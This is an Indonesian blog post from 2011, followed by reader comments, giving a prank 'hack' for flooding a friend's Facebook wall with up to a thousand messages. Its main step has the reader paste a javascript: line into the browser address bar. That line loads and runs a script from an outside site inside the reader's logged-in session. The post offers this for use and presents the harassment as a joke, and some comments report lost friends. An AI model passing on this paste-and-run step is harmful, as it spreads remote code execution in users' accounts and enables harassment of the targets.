Selasa, 07 Juni 2011

Cara Hack ngebom wall FB teman

Jual Kaos Twitter
Tips Facebook ini benar-benar gokil, karena saya ngakak waktu nyonba cara ini. Cara Hack ngebom wall FB teman ini intinya adalah memenuhi wall teman dengan pesan dinding kita. Ya seperti sms bomb kalau pada HP. Berapa jumlah pesan yang bisa kita kirim? Ya terserah anda, saya sendiri mengirim 1000 pesan. hahaha. Biar mampus sekalian tuh.


Dan tanpa perlu panjang lebar lagi, berikut caranya :
  1. Buka FB korban.
  2. Lalu copy paste code berikut pada addres bar
    javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)
  3. Untuk pop-up yang muncul pertama, isikan jumlah pesan yang ingin anda kirim.

  4. Dan pop-up yang kedua, isikan pesan anda.

  5. Setelah selesai, reload kembali halamannya. Berikut contoh hasilnya.


    Bagaimana Cara Hack ngebom wall FB teman? hahaha. Saya sendiri ngakak waktu ngeliatnya. Jangan terlalu dibuat usil ya. Nanti teman anda bisa marah, dan saya tidak bertanggung jawab bila anda dimarahi teman anda. hehehe :)

    Baca juga Flood coment Facebook.

    16 komentar:

    1. sob :
      kog kadang bisa kadang gak ya?

      BalasHapus
    2. gila gara gara nyoba gini ,,temen guwe di fb tinggal dikit :(

      BalasHapus
    3. Om ko ga nongol pop up nya

      BalasHapus
    4. @asd : kalau udak selesai ngisi pop up, reload halamanya.
      @newbie : barusan saya coba muncul kok.

      BalasHapus
    5. masalahnya gimana cara masuk FB teman kita he.....

      BalasHapus
    6. kok pop upnya nda muncul yach

      BalasHapus
    7. pake Google Chrome ya? coba pake Firefox

      BalasHapus
    8. gag bisa lewat firefox atau googlecrome....

      BalasHapus
    9. udah di patch ini Gan.
      aku cari yang baru dulu.
      kalo ada di share

      BalasHapus
    10. thanks info nya :) , jangan lupa mampir ke blog saya ya gan ..

      http://pavilion1st.blogspot.com/ , dan jangan lupa di follow :) ..

      BalasHapus
    11. pulsa murahh,
      trun harga,,,
      dftr hrg: indsat : 5:5200 10:10200 dst
      axis: 5:5175 10:10175 dst
      yg mint silahkan dftar sgera, gratisssssss,

      pndftran bisa lihat di blog http://reloadzzpulsamurah.blogspot.com AR PULSA, pulsa termurah resmi dan terpercaya

      BalasHapus

    Berkomentarlah yang baik dan sopan :)

    *

     
    Related Posts Plugin for WordPress, Blogger...